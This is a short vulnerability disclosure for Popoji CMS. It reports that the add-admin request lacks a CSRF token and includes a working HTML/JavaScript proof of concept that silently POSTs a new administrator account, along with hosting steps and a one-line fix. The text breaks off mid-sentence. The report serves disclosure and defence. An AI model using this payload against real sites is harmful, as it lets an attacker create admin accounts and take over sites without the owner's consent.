Missing CSRF Token On Add Admin [Popoji CMS]
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video : https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...